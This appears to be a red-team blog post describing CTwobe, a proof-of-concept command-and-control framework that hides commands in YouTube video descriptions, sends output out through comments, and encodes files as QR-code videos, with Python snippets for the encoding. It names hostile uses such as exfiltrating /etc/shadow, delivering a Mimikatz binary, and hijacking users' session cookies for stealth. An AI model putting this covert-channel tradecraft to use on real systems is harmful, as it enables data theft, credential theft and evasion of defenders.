2025-12-03

CTwobe: Hiding Command & Control in YouTube Traffic

C2, Covert Channels, Python, Red Teaming

Hiding in the Noise

As defenders get better at inspecting network traffic, the "living off the land" philosophy has extended beyond binaries to network infrastructure. Why set up a suspicious C2 domain when you can route your traffic through the most whitelisted, high-volume domain in the world: YouTube?

This is the premise behind CTwobe, a Proof-of-Concept (PoC) framework I built to demonstrate how social media APIs can be weaponized for covert communication. By tunneling commands through video descriptions and exfiltrating data via comments, CTwobe turns a standard YouTube channel into a fully functional C2 infrastructure.

The Technique: API as a Dead Drop

The core concept is simple: use YouTube as a "dead drop" for asynchronous communication.

  1. Command Channel: The Controller updates the description of a specific video with an encrypted command.
  2. Execution: The Agent (running on the target) polls this video description. When it sees a new command, it executes it.
  3. Exfiltration Channel: The Agent posts the command output as a comment on the same video.
  4. Binary Transfer: For larger files or payloads, we get creative. We encode binary data into a sequence of QR codes, render them as a video, and upload it to YouTube. The receiver downloads the video and decodes the QR frames back into the original binary.

The Architecture

I built the framework in Python for rapid prototyping, leveraging the google-api-python-client to interact with YouTube.

  • Controller (CtwobeController.py): The operator's console. It handles the OAuth flow, encrypts commands, and parses the comments to display results.
  • Target Agent (CtwobeTarget.py): The implant. It sits on the victim machine, polling for instructions and running commands.
  • QRizon (QRizon.py): The "magic" module. It handles the conversion of files to QR-video streams and back.

graph TD
    subgraph Attacker
        Controller[Controller Script]
    end

    subgraph YouTube[YouTube Infrastructure]
        Video[Video Description Commands]
        Comments[Comments Section Output]
        Uploads[Uploaded Videos Binaries]
    end

    subgraph Victim
        Agent[Target Agent]
    end

    Controller -->|Update Description| Video
    Agent -->|Poll Description| Video
    Agent -->|Post Comment| Comments
    Controller -->|Read Comments| Comments
    Agent -->|Upload QR Video| Uploads
    Controller -->|Download & Decode| Uploads

The QRizon Magic: Turning Files into Videos

This is where things get interesting. How do you exfiltrate a 5MB binary through YouTube? You can't just dump it in a comment. The answer: QRizon, a custom encoder that transforms arbitrary files into QR code video streams.

The Problem

YouTube is designed for video, not file transfer. But what if we could encode our data as video? QR codes are perfect for this:

  • They're error-correcting (they tolerate a degree of damage from YouTube's compression)
  • They're visually distinct (easy to decode programmatically)
  • They can hold arbitrary binary data (after Base64 encoding)

The Dual-QR Technique

The naive approach is one QR code per frame. But that's wasteful. QRizon uses two QR codes per frame, side-by-side, effectively doubling the data density.

Each frame is 640x320 pixels:

  • Left QR: 300x300 pixels
  • Padding: 40 pixels
  • Right QR: 300x300 pixels
  • Borders: 20 pixels on all sides

At 30 FPS, this creates a smooth video that YouTube accepts without issue.
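
The layout above can be sanity-checked with a few lines of arithmetic. This is a minimal sketch rather than QRizon's actual code: the constant names mirror the ones used in the snippets in this post, while the helpers `frame_size` and `right_qr_origin` are hypothetical. Note that the listed components add up to 680x340 rather than 640x320, so one of the stated figures (frame size, border, or padding) presumably differs in the real implementation.

```python
# Values taken from the layout described above.
QR_SIZE_PIXELS = 300
PADDING_PIXELS = 40
BORDER_PIXELS = 20


def frame_size(qr_size: int, padding: int, border: int) -> tuple[int, int]:
    """Return (width, height) of a frame holding two side-by-side QR codes."""
    width = border + qr_size + padding + qr_size + border
    height = border + qr_size + border
    return width, height


def right_qr_origin(qr_size: int, padding: int, border: int) -> tuple[int, int]:
    """Return the top-left (x, y) corner of the right-hand QR code."""
    return border + qr_size + padding, border


if __name__ == "__main__":
    print(frame_size(QR_SIZE_PIXELS, PADDING_PIXELS, BORDER_PIXELS))       # (680, 340)
    print(right_qr_origin(QR_SIZE_PIXELS, PADDING_PIXELS, BORDER_PIXELS))  # (360, 20)
```

For comparison, a 10-pixel border with 20 pixels of padding would give exactly 640x320 for two 300x300 codes.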

The Encoding Pipeline

Here's how a file becomes a video:

1. Read and Encode

import base64

# Read the whole file as bytes, then Base64-encode it to ASCII text
with open(input_filepath, 'rb') as f:
    raw = f.read()
b64 = base64.b64encode(raw).decode('ascii')

We read the file as raw bytes and Base64-encode it. This ensures the binary data survives as ASCII text in the QR codes.

2. Metadata Injection

Before encoding the file data, we prepend metadata:

metadata = {"filename": file_filename, "size": file_size}
metadata_str = "QR_FILE_METADATA:" + json.dumps(metadata)

This tells the decoder what the original filename was and how many bytes to expect. The metadata is chunked separately (up to 1000 chars per QR) and placed at the start of the video.
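
As a rough illustration of this step, the sketch below builds the header from a file path and its bytes, then splits it into QR-sized pieces. The prefix, the JSON keys, and the 1000-character limit come from the text above; the function names and the `METADATA_CHUNK_SIZE` constant are hypothetical, and deriving `filename` from the path's basename is an assumption.

```python
import json
import os

METADATA_PREFIX = "QR_FILE_METADATA:"  # prefix shown in the snippet above
METADATA_CHUNK_SIZE = 1000             # "up to 1000 chars per QR" (assumed constant name)


def build_metadata_header(input_filepath: str, raw: bytes) -> str:
    """Build the metadata string for a file whose contents are `raw`."""
    metadata = {"filename": os.path.basename(input_filepath), "size": len(raw)}
    return METADATA_PREFIX + json.dumps(metadata)


def chunk_text(text: str, chunk_size: int) -> list[str]:
    """Split text into consecutive pieces of at most chunk_size characters."""
    return [text[i:i + chunk_size] for i in range(0, len(text), chunk_size)]


if __name__ == "__main__":
    header = build_metadata_header("/tmp/example/report.pdf", b"abc")
    print(header)
    print(len(chunk_text(header, METADATA_CHUNK_SIZE)))
```

With short filenames the header fits in a single QR code; only unusually long names would spill into a second chunk.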

3. Chunking

The Base64 data is split into 200-character chunks:

CHUNK_SIZE = 200  # Base64 characters per QR code
data_chunks = [b64[i:i+CHUNK_SIZE] for i in range(0, len(b64), CHUNK_SIZE)]

Each chunk becomes one QR code. For a 1MB file (~1.3MB of Base64), that is about 6,500 QR codes. At two codes per frame, that is 3,250 frames, or roughly 108 seconds of video at 30 FPS.
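
The estimate can be reproduced exactly with integer arithmetic. The sketch below is illustrative only: `estimate_video` is a hypothetical helper, it treats 1MB as 1,000,000 bytes, and it ignores the handful of metadata QR codes at the start of the video. The chunk size, codes per frame, and frame rate are the values quoted in this post.

```python
CHUNK_SIZE = 200     # Base64 characters per QR code
QRS_PER_FRAME = 2    # dual-QR layout
FRAME_RATE = 30      # frames per second


def estimate_video(file_size_bytes: int) -> dict:
    """Estimate QR count, frame count, and duration for a file of the given size."""
    # Base64 emits 4 characters for every 3 input bytes, rounded up.
    b64_chars = 4 * ((file_size_bytes + 2) // 3)
    qr_codes = (b64_chars + CHUNK_SIZE - 1) // CHUNK_SIZE
    frames = (qr_codes + QRS_PER_FRAME - 1) // QRS_PER_FRAME
    return {
        "b64_chars": b64_chars,
        "qr_codes": qr_codes,
        "frames": frames,
        "seconds": frames / FRAME_RATE,
    }


if __name__ == "__main__":
    for size in (1_000_000, 10_000_000):
        print(size, estimate_video(size))
```

For 1,000,000 bytes this gives 6,667 QR codes and 3,334 frames (about 111 seconds), in line with the rounded figures above. For 10,000,000 bytes it gives 33,334 frames, or roughly 18.5 minutes.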

4. Frame Generation

For each frame, we generate two QR codes and paste them side-by-side:

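import qrcode
from PIL import Image

num_qrs = len(all_chunks)
num_frames = (num_qrs + 1) // 2  # two QR codes per frame, rounded up
for i in range(num_frames):
    frame_img = Image.new('RGB', (FRAME_WIDTH, FRAME_HEIGHT), 'white')
    # Left QR (always present)
    qr_left = qrcode.make(all_chunks[i*2])
    frame_img.paste(qr_left, (BORDER_PIXELS, BORDER_PIXELS))
    # Right QR (absent on the last frame when the chunk count is odd)
    if i*2 + 1 < num_qrs:
        qr_right = qrcode.make(all_chunks[i*2 + 1])
        frame_img.paste(qr_right, (BORDER_PIXELS + QR_SIZE_PIXELS + PADDING_PIXELS, BORDER_PIXELS))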

5. Video Export

We use OpenCV to write the frames as an MP4:

fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(output_video_path, fourcc, FRAME_RATE, (FRAME_WIDTH, FRAME_HEIGHT))

The Decoding Pipeline

On the receiving end, the process reverses:

  1. Download the video (using yt-dlp or similar)
  2. Extract frames with OpenCV
  3. Scan each frame for two QR codes using pyzbar
  4. Reconstruct the Base64 string by concatenating all decoded chunks
  5. Decode Base64 back to binary and write to disk

import base64
import cv2
from pyzbar import pyzbar

data_parts = []
cap = cv2.VideoCapture(input_video_path)
while True:
    ret, frame = cap.read()
    if not ret:
        break  # end of video
    # Extract left and right QR regions (rows first, then columns)
    left_region = frame[BORDER_PIXELS:BORDER_PIXELS+QR_SIZE_PIXELS,
                        BORDER_PIXELS:BORDER_PIXELS+QR_SIZE_PIXELS]
    right_region = frame[BORDER_PIXELS:BORDER_PIXELS+QR_SIZE_PIXELS,
                         BORDER_PIXELS+QR_SIZE_PIXELS+PADDING_PIXELS:...]
    # Decode QR codes
    for region in [left_region, right_region]:
        qrs = pyzbar.decode(region)
        for qr in qrs:
            data_parts.append(qr.data.decode('ascii'))
cap.release()
# Reconstruct file (metadata chunks must be separated out before this step)
full_b64 = ''.join(data_parts)
raw = base64.b64decode(full_b64)
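
The final reassembly step can be made more robust by checking the result against the size recorded in the metadata. The following is a minimal sketch under stated assumptions, not QRizon's code: `reassemble` is a hypothetical helper, and it assumes the decoded strings arrive in order with the metadata fitting in the first QR code.

```python
import base64
import json

METADATA_PREFIX = "QR_FILE_METADATA:"  # prefix used by the encoder


def reassemble(decoded_chunks: list[str]) -> tuple[dict, bytes]:
    """Split off the metadata header, rebuild the file bytes, and verify the size."""
    if not decoded_chunks or not decoded_chunks[0].startswith(METADATA_PREFIX):
        raise ValueError("first chunk is not a metadata header")
    metadata = json.loads(decoded_chunks[0][len(METADATA_PREFIX):])
    # validate=True rejects characters outside the Base64 alphabet.
    raw = base64.b64decode("".join(decoded_chunks[1:]), validate=True)
    if len(raw) != metadata["size"]:
        raise ValueError(f"expected {metadata['size']} bytes, got {len(raw)}")
    return metadata, raw


if __name__ == "__main__":
    payload = b"hello, world" * 50
    b64 = base64.b64encode(payload).decode("ascii")
    chunks = [METADATA_PREFIX + json.dumps({"filename": "sample.bin", "size": len(payload)})]
    chunks += [b64[i:i + 200] for i in range(0, len(b64), 200)]
    metadata, raw = reassemble(chunks)
    print(metadata["filename"], raw == payload)
```

A dropped or duplicated frame changes the decoded length, so the size check surfaces it instead of silently writing a corrupt file.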

Why This Works

  • Compression tolerance: YouTube's re-encoding is lossy, but QR codes are high-contrast black-and-white patterns. As long as each QR code is large enough (300x300 pixels here), YouTube's H.264 encoder preserves enough detail for pyzbar to decode it.
  • Error correction: QR codes have built-in error correction, so the data survives even if a small fraction of each code is corrupted.
  • Scalability: Video length grows linearly with file size. At 200 Base64 characters per QR code, two codes per frame, and 30 FPS, a 10MB executable becomes a video of roughly 18 minutes, which is still plausible for an "unlisted" upload.

Real-World Usage

In the CTwobe framework:

  • Exfiltration: upload /etc/shadow → Agent encodes the file, uploads the video, and posts the video ID as a comment.
  • Payload Delivery: Operator encodes a Mimikatz binary, uploads it to YouTube, and sends download VIDEO_ID → Agent downloads and decodes it in-memory.

Challenges and "Failures"

Building this wasn't without its headaches. Here are a few places where the reality of the API bit back:

1. The API Quota Nightmare

Google's YouTube Data API enforces a strict daily quota, and every call is charged against it, even a simple "list videos" read. Polling every few seconds burns through the free-tier quota long before the day is over.

  • The Fix: I had to dial back the polling interval to 60 seconds. This makes the C2 slow, but if the goal is evasion, then this works in our favor.
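
The trade-off is easy to see with some back-of-the-envelope arithmetic. The figures below are assumptions based on Google's published quota table at the time of writing (a default budget of 10,000 units per day and 1 unit per read-style list call); check the current documentation before relying on them. `daily_read_cost` is a hypothetical helper.

```python
SECONDS_PER_DAY = 86_400
DAILY_QUOTA_UNITS = 10_000  # assumed default daily budget
READ_COST_UNITS = 1         # assumed cost of one list call


def daily_read_cost(interval_seconds: int, cost_per_call: int = READ_COST_UNITS) -> int:
    """Quota units spent per day by one poll every interval_seconds."""
    return (SECONDS_PER_DAY // interval_seconds) * cost_per_call


if __name__ == "__main__":
    for interval in (5, 60):
        used = daily_read_cost(interval)
        print(f"{interval:>2}s interval: {used} units/day "
              f"({used / DAILY_QUOTA_UNITS:.0%} of the assumed budget)")
```

Under these assumptions, a 5-second interval costs 17,280 units per day on reads alone, which is more than the whole budget, while a 60-second interval costs 1,440 and leaves room for the write calls.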

2. Comment Formatting

YouTube comments aren't raw text dumps. They have length limits and don't preserve whitespace well.

  • The Fix: I had to implement chunking and encoding (Base64) to ensure the data survived the round trip without corruption, which further ate into the API quota.

3. Latency

This is a slow channel. You issue a command, wait a minute for the agent to pick it up, then wait for the comment to post. It requires a shift in mindset from "interactive shell" to "task and wait."

The "Stealth" Upgrade: Browser Automation

While the API approach is clean, it has a major flaw: API credentials. OAuth tokens and API keys can be revoked, monitored, and tied to a specific developer account. Plus, the traffic looks like API calls, not user behavior.

This is where the technique can evolve from a PoC to a serious threat.

Enter Playwright

Instead of using the API, we can use Playwright or Puppeteer to drive a headless browser instance.

  1. Session Hijacking: The agent steals the legitimate user's session cookies for YouTube.
  2. Automation: The agent launches a headless browser using these cookies.
  3. Human Emulation: It navigates to the video, "watches" it (while reading the description), and "types" a comment.

Why is this dangerous?

  • No Quotas: You are just a user watching videos. There are no API limits.
  • Perfect Blending: The network traffic is indistinguishable from a user binge-watching cat videos. It's full HTTPS, loading all the standard assets, ads, and telemetry.
  • Attribution Nightmare: The traffic originates from the user's own authenticated session. To Google, it looks like the user is doing it.

Conclusion

CTwobe shows that you don't need complex custom protocols to hide your traffic. Sometimes, the best place to hide is in the loudest room on the internet. While the API-based PoC has limitations, combining this logic with browser automation creates a covert channel that is very difficult to detect and block without also cutting off YouTube for legitimate users.

Disclaimer: This project is for educational and research purposes only. Don't use this on systems you don't own.